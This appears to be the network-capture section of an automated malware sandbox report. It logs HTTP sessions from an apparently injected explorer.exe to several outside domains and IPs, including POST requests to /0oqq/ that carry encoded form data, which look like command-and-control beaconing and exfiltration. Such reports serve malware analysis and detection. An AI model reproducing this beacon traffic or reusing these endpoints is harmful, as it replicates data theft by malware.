WCClR0JiX_DPSAC-x4nccKbqGNX_YsyUWutCjpTjyuDhTxfghN~D4Y0kG_UqD9ZGVq9WW_duElqwIFQYFSwtQO(kyJm5t4ZW8GlRL4rO3y3uwXpIBws1Mt8IawHnz6RUMMN9YZeo1xXjN4cm9cYrdlZa9Zub(YaiFLBgNmiSnm6i~FYfa83EZ_(PvQt0WiRINvo1edLhxDMKfMhDfedpbcs4fw25LAkOjvFX5sDCV8SKqCaTPSJeDf4aZyITEVHiemdVg5~0dY3AMp7QGxXTHni4Ju2aT2(N1tsoK-XLbFuDTUeabgD2J72dUAai8Mf4ySVuW7qftU~0QoPgDRjCTQpXlLvz3oj8ZcOAPViusqYwbTkz85b7xM2J9f~U8hunZtUxf9TYB5xhKW1Peufbs8penm~K2zybMkKHdGbBF1nW5iv5F42tylAqj_iO8_yDj3AeYRnak93mpsXODuRDoH9l9gUFdhVNeOVp6hLWcFbyY5nYOxvqd0rh6iZFn5QiQ-Sc4noFHuUO2tTsQlyMs-itS3rmHJ1_4HRQ70Ca8S4Kcj9iOu6KhohcL0unxxilHNWhvcSXL5MXvmr7a5oh0mJ6CWtusjLPaQCtEF07TOI3fdk0N5l6HVFUIWyJ(CVIrGouA51T~L3vlhhBvl2S5A4oL-uSX3IHhKTkozlYB04-WKg5hrrCzuHMsyyaFfICzFqgZhQF7f~IubyIjJiuyzLTzhXV5D~ndNmlDLFAxGEoW_BBDPmisfT-05qCZVYOz7EqVxvlIrzDKaYb~lM_h7khlnjgXpN0AC2rheDCm2OVLTabQ3LQUzAHRSBHVDlvh0xw(rv5Y8rIiw(GgXU_bCpTJhWBCtmqjmWQY_lAWIF9wxEH1t~JYdYvrEl7c76RTAnu2VY70AzqbmIahhT3w3txNjSo26IRrqUvWo4LfkTznh75UXXaPt4DByCquMw9uv9Qfk06eyaTKO06lA6EIGfFgUn-rcQQnreaU9YWqZQrHBrEZtLuJjgOY21ciqG17hl9rH1WvavZJSY7mBmDC03uFom3uoHZRykcTQqHUkuaXwrKTiE814ll4Wzi419yh9ghZwViF5suIYQeR2b28CtCWWUqKr18PXty~lYiajcdYoGV8Y4A8SzVaAT9(Ci5QEqR9dMYrjVUBwM5~b3vW72d6yKF6EaniUi28Jx_vSp0dd(zOhDnkm~SSdPbpq9ngS8DTUmI3lIC8bcCmv5ITwnSSFJs4HL8QmVf~q46x_qjqapSDrpDa9bW(AB-8p7tKqk1ArQlMRlN6KO7TqCtinyrd31hp5O14fidfX4bZtxR0GZnzDS3z0zXIJJch6tZ8cOCScJj7yFbo0Jar_dHdkivFCVN17evk9X9m6nZX6~aWQD4LQXzdEmTH-zG7Qd7TtTAXVUM4VDA3KIB76h1LauPu7Ipxwivc59xw_4oJbgTR7VoMbwNTQICk97ro1NfV9ot3dIQ5twTw7PrS9c4s_IIM9fNlFjnMtHhMrUwju4J0Y5NGAqQ8M9u9FElfXgfRbWl3yd-aBxkv851Xk4f5cEa2eNqdcBf
                                                                                                                      Mar 20, 2023 09:11:18.804119110 CET336INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Mon, 20 Mar 2023 08:11:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: parking_session=cd2f508d-57ca-4885-a4d3-855b63be9b32; expires=Mon, 20-Mar-2023 08:26:18 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_f2cNXgE8cPdm72znqmDh5cq32UuZaCB1P1WZz7bITNCoTvYoRvbxgDuh2OUM3jdke912kvHZsHYuwnEmVjasmw==
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 31 37 31 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 85 79 4f 77 a3 ca 93 e5 57 a9 a9 4d 2f 6a 7e af 48 10 7e a5 9e 57 ef 1c 23 48 10 16 29 93 e4 1f c8 cd 1c 20 91 11 24 08 5b 58 42 7c fa 09 bf ee d3 b3 eb de 54 d9 96 84 20 f2 c6 8d 7b 6f fc f5 bf f4 a5 9e 1f 53 f3 ad 9d 07 f3 f7 5f 5f ff 7e d3 e5 5c fe ab d4 95 b9 d4 7d df 3c 7e 7f 4f f0 fd ee a7 45 fc 72 51 fb f6 56 93 e7 34 f0 bc f4 d9 cf ee cf f7 ec 39 f6 9e 89 ff 31 d9 66 fd f3 f9 38 3c fb 25 f9 35 3f bb d6 e1 2a eb ee 80 1f 29 ae ab 9f af 36 5b 6a f7 d7 a5 38 36 fb 43 e5 dc bc fb 9f f1 d3 69 33 95 43 ff 9c 8a 2c fd 7c 2f ae 2f 8b 53 ac 9a 47 bb 5b 25 d4 0d f3 eb ee f9 1e 3c 3f a7 bf 7f ff df 93 5d 93 fc 2d f8 55 bf ea e1 4f 7b 1d df 07 bf 75 eb 77 c7 e6 9f aa dc 79 e8 15 49 b5 fe 59 ed 19 d9 5d d8 ad b8 d0 5b b5 bc f9 9f ad 7d e4 89 d3 e9 be d9 22 bb bf 45 ea 1a 15 9f f7 31 18 44 57 5e 87 fb ef df df e1 89 9b 52 ff fd d7 d0 cc e5 b7 ba 2d 3f ae cd fc fb fb e7 7c fa d7 2f 78 ed 9f bf 8e e5 d0 fc fe 7e 3b 37 f7 e9 f2 31 7f ff 56 5f c6 b9 19 e1 5d f7 b3 9e db df ba b9 9d eb e6 5f ff fc f2 bf bf 9d c7 f3 7c 2e cd bf
                                                                                                                      Data Ascii: 171eyOwWM/j~H~W#H) $[XB|T {oS__~\}<~OErQV491f8<%5?*)6[j86Ci3C,|//SG[%<?]-UO{uwyIY][}"E1DW^R-?|/x~;71V_]_|.
                                                                                                                      Mar 20, 2023 09:11:18.804193020 CET337INData Raw: ae 75 69 9a df 08 ae 61 ce 63 ff ed a3 31 bf bf 4f 1f 0d 7c 76 6c 6a b8 48 fb d1 9c 7e 7f 6f e7 79 ba fe fb cf 9f f7 fb fd 8f b7 cb e5 cd 34 7f d4 97 01 be e2 e3 72 bd 5e 3e ce 6f e7 f1 ef bf 7e fe c7 1d 56 17 fd f8 fb 2f 7d be 7d 3b eb df df e7
                                                                                                                      Data Ascii: uiac1O|vljH~oy4r^>o~V/}};\|]>f|_<oG4;}a:"2G+bn%~C<*J\c!]&]zsBj;QOt~-Zn[\HsUy
                                                                                                                      Mar 20, 2023 09:11:18.804220915 CET339INData Raw: f1 f6 5e 23 6f af 45 9c 67 bc 46 15 86 33 b1 c8 9d 47 13 70 77 cb 4f 03 f0 d5 38 8d da 6c cb 3a a7 6d 8d 74 98 45 54 71 a3 37 72 6c 3f 2b bc 85 de c1 63 93 c7 2f 45 ae 4e 15 d2 71 cd 89 97 4a dc 12 ee 9e 33 6c 5e 6a 3e 3f aa d1 c4 8d 7c b3 45 d0
                                                                                                                      Data Ascii: ^#oEgF3GpwO8l:mtETq7rl?+c/ENqJ3l^j>?|E[4TGE8]q&&{Le+7k4Q1/v)G"/K1RUb Vu`~b>s(:Jz{My'<e|#R3V}(GbB+
                                                                                                                      Mar 20, 2023 09:11:18.804246902 CET340INData Raw: 00 73 f0 13 73 01 a2 26 cd e3 a0 5c 95 62 79 62 13 39 8b 4c b6 af dc a2 47 25 26 bb ce bd 90 8a 16 f4 70 7b d6 c8 d0 3a a0 7b 1e 15 9b 12 6d 81 ff dd f7 63 b0 05 7d a6 07 0a bc ae 73 3d 83 fe e3 ca de 7e 94 e3 97 c6 41 23 e8 8f 17 21 37 ae 1a 6b
                                                                                                                      Data Ascii: ss&\byb9LG%&p{:{mc}s=~A#!7kt,+fc$du'/s4&;.`Is$&rp;,K)J"HvGS[)MTuU9GH;A#0cru7ROu.o[1L~ks
                                                                                                                      Mar 20, 2023 09:11:18.804277897 CET341INData Raw: 9f 06 e9 68 7c e0 52 a2 57 83 34 e8 27 35 5c 01 83 c2 85 7e 3e b0 f5 19 6a 11 d8 94 9b 48 f5 e0 52 e5 66 ae c1 13 72 e9 3e 94 c4 e2 28 4c 5e 8b 89 d6 7d bb 03 7d 5b ea 60 41 19 d4 88 a1 1e f2 04 32 d5 bc 5e 08 d4 ed 98 c7 fb 44 68 1b f4 78 09 7c
                                                                                                                      Data Ascii: h|RW4'5\~>jHRfr>(L^}}[`A2^Dhx|v.)kA.@t|pUv[j&!K<T{;<n&wRH/69,8K&(qvH;mY415OjI/Q&|K4,m
                                                                                                                      Mar 20, 2023 09:11:18.804303885 CET342INData Raw: 60 f6 ee 4e 1d 21 a4 47 bb cc 22 91 00 fd cb 59 bb c2 59 13 62 63 93 58 ed 2c a5 f8 a8 19 7e 65 20 4c 38 86 7d 9c 99 e2 a3 2f 7a c8 80 fa 72 6c df 69 44 ce 60 bb ec 54 2a 5e 4b dc 83 23 b1 75 b8 87 ec 3e 5d 60 26 46 cc 6e 4d 35 68 a7 b4 44 5b 86
                                                                                                                      Data Ascii: `N!G"YYbcX,~e L8}/zrliD`T*^K#u>]`&FnM5hD[}s? "P=z-YK9#TwdN:9{?$}olptWa\2`*On]~YF8M)\d/Sf^MQH


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      36192.168.2.349735199.59.243.22380C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:21.144301891 CET343OUTGET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.hudsonandbailey.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:11:21.350609064 CET344INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Mon, 20 Mar 2023 08:11:21 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: parking_session=42136b05-bb21-8c3c-3d47-9b78d5e6bed8; expires=Mon, 20-Mar-2023 08:26:21 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EiDJt0X31b6l/t+ChrwTwo0EyKqXHdIWbOoCpUceRWn54dkUnBaAcNCk3Wbo379QDDTnF1Ih9TB9VyVqs+eUjA==
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 34 63 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 69 44 4a 74 30 58 33 31 62 36 6c 2f 74 2b 43 68 72 77 54 77 6f 30 45 79 4b 71 58 48 64 49 57 62 4f 6f 43 70 55 63 65 52 57 6e 35 34 64 6b 55 6e 42 61 41 63 4e 43 6b 33 57 62 6f 33 37 39 51 44 44 54 6e 46 31 49 68 39 54 42 39 56 79 56 71 73 2b 65 55 6a 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                                                                      Data Ascii: 4cf<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EiDJt0X31b6l/t+ChrwTwo0EyKqXHdIWbOoCpUceRWn54dkUnBaAcNCk3Wbo379QDDTnF1Ih9TB9VyVqs+eUjA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                                                                                                                      Mar 20, 2023 09:11:21.350645065 CET345INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74
                                                                                                                      Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNDIxMzZiMDUtYmIyMS04YzNjLTNkNDctOWI3OGQ1ZTZiZWQ4IiwicGFnZV90aW1lIjoxNjc5Mjk5ODgxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy
                                                                                                                      Mar 20, 2023 09:11:21.350660086 CET345INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      37192.168.2.349736198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:26.503138065 CET346OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.virginhairweave.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.virginhairweave.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
                                                                                                                      Mar 20, 2023 09:11:26.643553019 CET347INHTTP/1.1 403 Forbidden
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:11:26 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 175
                                                                                                                      x-fail-reason: Bad Actor
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      38192.168.2.349737198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:29.173513889 CET353OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.virginhairweave.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.virginhairweave.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 44 6a 42 31 5a 38 69 73 6f 6c 32 4b 48 28 39 73 66 75 56 58 69 50 4a 4b 74 79 50 57 48 77 45 71 48 42 4b 6b 75 76 6d 67 44 53 6c 45 56 47 48 51 30 6b 75 39 51 41 42 56 62 28 63 5a 72 47 36 64 34 41 51 6d 64 39 2d 38 48 49 66 67 58 52 68 35 61 47 57 70 65 4a 4c 49 4a 75 34 53 70 39 36 38 30 4f 59 5a 39 6d 58 56 6f 4d 78 72 4b 55 4c 4d 79 43 6c 6d 6e 70 48 73 74 42 53 33 79 38 5a 63 6f 7a 30 67 6b 43 4a 4c 71 7e 70 38 33 48 4a 51 50 4e 4a 30 69 6f 5a 5a 32 4d 52 46 4c 61 59 6d 32 6c 68 7e 63 6e 34 35 32 70 48 4a 57 55 42 74 7a 41 57 6b 31 45 7a 73 70 71 6e 53 39 42 6b 6b 4a 73 49 6a 42 44 68 45 41 59 65 55 55 68 4f 70 64 5a 52 71 79 4b 50 58 76 66 44 61 4f 6e 41 6d 42 4c 4a 68 43 78 6f 4f 62 41 63 43 34 48 48 52 39 58 31 5a 6c 49 4a 7e 78 6e 32 61 63 77 32 51 4e 30 56 53 6a 47 32 4a 56 35 32 52 34 51 61 32 61 77 75 4c 6b 32 58 33 59 57 34 77 79 31 30 4c 78 63 66 37 42 71 77 45 38 42 56 45 74 51 61 6f 6a 58 45 66 78 57 75 73 53 37 44 43 52 78 61 58 53 75 55 36 79 45 51 64 6e 5a 31 28 56 4c 63 4d 70 4a 4c 47 55 65 4f 7e 6a 57 49 69 6c 36 4f 42 6c 64 6a 55 56 38 2d 5a 59 6d 47 7e 4a 61 65 6d 67 31 56 7e 52 6a 6f 66 4f 62 50 6c 2d 6c 74 43 47 66 61 62 65 5a 75 58 61 50 4d 74 76 6a 52 64 38 6b 65 69 4a 66 6d 72 70 61 76 34 53 50 62 50 39 31 32 74 55 62 4b 6a 4b 4a 36 79 47 71 74 57 71 42 4d 67 6d 57 61 61 79 66 32 28 4e 53 4b 34 54 77 34 49 57 5a 58 68 6c 57 74 52 36 7a 4b 61 66 35 34 44 43 59 5a 47 48 37 6f 4a 37 69 79 30 6e 65 61 45 74 7a 74 4b 76 39 54 5a 62 75 4f 31 76 55 67 78 57 38 38 43 64 53
                                                                                                                      Data Ascii: ICHyvj5=jRIopuIKm5m4BfQXdJDzqIUYcYfTDThRrXk2mflilbEkG1A29K6crb3_Od7qU31C5LLeVeTo1prr8U35o8I1j_OFkL83WGh7c9cMvQNLOjh0qm(HbkJuoHU3PatuhMWUsEIVG2rtNsNRc4FSutcS3Q0PA_Ez6SpgL_ye76ZHHqg3JoNkhfCrsjzqQ005cBb4SKyghlCZekEHhpaJndQ0kYPnoS8G4epN55YeiBV8expmsMn4VH1yAEFnv8nwuFVyCL5Xd2uKS7CD2_ISxQfqDIoANuWjQ0yDPEYCNQd5tSPKVL6l6LF7lC16gGnXALXIXz7ijkuHJLe8a9Na7gwPYr6XoxElMV2wfpmCBfAYZkCcAeVtqDvdvop0NAzXuR~-nCWN9nghed~RNFkwH3sKpK0ma6K7ShgZgfa3Srr-12dCYWji9fqXfBc0c5wDFHCVISUwDxu37LyRXg3dhy6BOI~P1HPxSUrRPGvgI0wJ89ljM1RnYx9qqlY2ULmULJaRihjfltftETxkSo94xFfPiMxoge(gqZ1Ig4PkMLMXFq(KMC43t4KoLnm-6G5d~gQSDgNFsvydmHTB5MHAg3SiQuysk59DtS~r51G5ICawqTJSOk9jyFAzsJ51Bf~FTnF3yqwlszWP4uJBf-kMPFYrUCAxg9ihqYkHj2M7NDxcJcdGcVaHk1oWaYMrQWY1MGGbszF0uoJnstBFqE2AnoAn(B5l0KhDL0bvWXsyAaNCuHXbVu1mJZ7oChIZT_snkMcowxniPRnzA4aaGXZ2TjhSB17QFYU9rdgQ~2DaZbkpIVKrOW7y(hkGsh~RukscfHw-LStlC2Ote953Hf9phDjB1Z8isol2KH(9sfuVXiPJKtyPWHwEqHBKkuvmgDSlEVGHQ0ku9QABVb(cZrG6d4AQmd9-8HIfgXRh5aGWpeJLIJu4Sp9680OYZ9mXVoMxrKULMyClmnpHstBS3y8Zcoz0gkCJLq~p83HJQPNJ0ioZZ2MRFLaYm2lh~cn452pHJWUBtzAWk1EzspqnS9BkkJsIjBDhEAYeUUhOpdZRqyKPXvfDaOnAmBLJhCxoObAcC4HHR9X1ZlIJ~xn2acw2QN0VSjG2JV52R4Qa2awuLk2X3YW4wy10Lxcf7BqwE8BVEtQaojXEfxWusS7DCRxaXSuU6yEQdnZ1(VLcMpJLGUeO~jWIil6OBldjUV8-ZYmG~Jaemg1V~RjofObPl-ltCGfabeZuXaPMtvjRd8keiJfmrpav4SPbP912tUbKjKJ6yGqtWqBMgmWaayf2(NSK4Tw4IWZXhlWtR6zKaf54DCYZGH7oJ7iy0neaEtztKv9TZbuO1vUgxW88CdStSvXpYRbz4inWmiQ0vZwG0GOukipiOQf7tf(nwzBK6_hwGfFVc4iwXyvBLa8yybS8L-cviRtFLKL5doNq3zQRXtH7~k(IHhM_hbOrAzYEBQI7WEKompoRFbHKDbJ6nKVH84epZRxe8TK8Aimw1yQtxxuj1JzY9KgtY1EmUZ0h8Inh6WFkBYMd3frIIlNkWGeBk-(xeyl5eZ1IlOmHNEM2W2F0hoXcgdkB4DlNn8(lliA9uJck0viLmYcEcPOTV-Nr6nLP2CjtVskNjGdb~J89QXW-6oOIxY72nvbxqOcX(nlFQFkvvVJOrToBlNvAT6npEd5G2bhhX20aOQnVVRdTmSIKgwugWQVXhAKVIuyWiGDHEp(V7vesKahAt5yB16(oChTTUT8Q4trdXL826N(iyPWP(Q8-h9Ij7-boxDLDktdgHlwMfbW_NQ8se1QeqtUlfjHD(CakcEZEa2NxlU5SvR~kIw~YGLlRYQY-5o(RCzkptrDovqb_fKruRh~S91sOjDDeJ7vtDADVf7G2U6xex9ig4GSiKWE1gT2bWAz7FEuoDZ78bwTBl-7CQYhadYoB~9Zd(A90~Oud78dQD5rKnIeF5KYf(Ee0JEJYY41net7_ZtLE~SbwMRFVqcHCxu3XskUloHL9V-djQy017Y94YxHDTSkITHyjR7fNPL8GlY0w9V4A04MVUKEkOpfykBekfdbksS8DPW0GL3jcwCDJvlGR~5kC0vo6~uJNiR0bjjDeZBx-flGz~u~UsHi0b_IHDV5w6hsLEDy6VBnCTy65CLsFjs5TS6RwWJZG